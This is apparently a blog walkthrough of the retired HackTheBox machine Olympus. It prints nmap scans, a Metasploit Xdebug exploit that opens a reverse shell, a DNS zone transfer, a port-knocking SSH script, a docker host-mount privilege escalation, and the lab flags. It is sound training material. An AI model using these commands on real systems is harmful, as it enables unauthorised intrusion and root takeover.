October 10, 2018

HackTheBox - Olympus

It’s been almost a week since I wrote my last writeup. So here I am, with a writeup on a new retired machine, Olympus. This machine was a good one. It took me quite a long to hack this one. So, let’s get started.


Target Information

IP Address : 10.10.10.83
OS Family : Linux
Hostname : Olympus

Host Information

IP Address : 10.10.14.21
OS Family : Linux
Hostname : LocalHost

Now, our first step will be enumerating the services running on the machine.

Enumeration

I use Nmap for enumeration purposes. So, I loaded my terminal & started with

mkdir nmap
nmap -sV -sC -oA nmap/primary 10.10.10.83

Here,

  • -sV returns info related to the services & their version
  • -sC runs default nmap scripts
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/primary

Now, this scan result shows that port 80, 53 & 2222 are open and unfiltered too. So, let’s now visit the port 80.

It just shows us the above image. Nothing useful there too. Now, Let’s run an UDP scan against it.

nmap -v -sU -sC -Pn -oA nmap/secondary 10.10.10.83

Here,

  • -v scans in verbose mode
  • -sU does a UDP scan
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/secondary

Well, that’s something. We got port 53 open & unfiltered. We got nothing useful except the SSH which requires credential to login. Now let’s try analyzing the webpage’s requests & responses. I use BurpSuite for that purpose.

Now that’s something really useful. We see Xdebug 2.5.5 extension running. It’s a PHP extension used for debugging purposes & hopefully that’s the vulnerability we need to exploit. Let’s get into it.

Exploitation

Let’s fire up Metasploit & search for exploits.
msfconsole
search xdebug

Yeah !! We found one. Now let’s use it.
use exploit/unix/http/xdebug_unauth_exec
set RHOST 10.10.10.83
set LHOST 10.10.14.21
exploit

Yay !! We got a meterpreter shell. Let’s explore it.

And we are now in the home directory of user zeus. Let explore it too.

And we see a directory airgeddon which itself contains some directory & files. One of the most interesting one was captured directory which contains two files. Let’s get into it.

Let’s open captured.cap in Wireshark.

And here we see a SSID Too_cl0se_to_th3_Sun. And after some more research on the contents of papyrus.txt, I got the folllowing SSH credentials.

Username : icarus
Password : Too_cl0se_to_th3_Sun

Now, let’s get into it.

Still no results. This is the moment where most of the hackers including me got stuck. Then, I focused on the contents of help_of_the_gods.txt. It contains a domain ctfolympus.htb. That’s the only thing that’s useful. That’s the same domain present in primary nmap scan. Let’s investigate the DNS.

dig AXFR ctfolympus.htb @10.10.10.83

Now we get to know that docker is running on the machine with three subdomains crete, hades & rhodes. Also, there’s a message Prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_Fire!. That’s a big hint for intruding the hades docker. The numbers 3456 8234 62431 is the sequence of port knocking process, Prometheus is the user & St34l_th3_Fire! is the password.

Now, let’s code a script hack.sh for it & accessing the filtered SSH.

#!/bin/bash

ports="3456 8234 62431"
host="10.10.10.83"
for x in $ports
do
	nmap -Pn -p $x $host
	sleep 1
done
ssh prometheus@${host}

Now, let’s execute it.

After providing the password, we’re succesfully inside the docker. Now let’s explore it & get the user flag.

Privilege Escalation

Now it’s time to get access to root. Let’s see what we got on the system & exploit the docker.
groups
docker run -d -v /:/hostroot olympia

We have successfull created a docker. Now, let’s execute it with correct permissions.
docker exec -i -t bcd /bin/bash

Let’s get the root flag now.

Flags

User : 8aa18519aff3c528c46bf675d6e88719
Root : aba486990e2e849e25c23f6e41e5e303

That night when we became gods… –Tyrell Wellick


And that’s it. Good Bye !!

NOTE : ALL PREVIOUS BLOG POSTS WERE DONE UNDER MY PREVIOUS ALIAS.
I NO LONGER USE THAT ALIAS.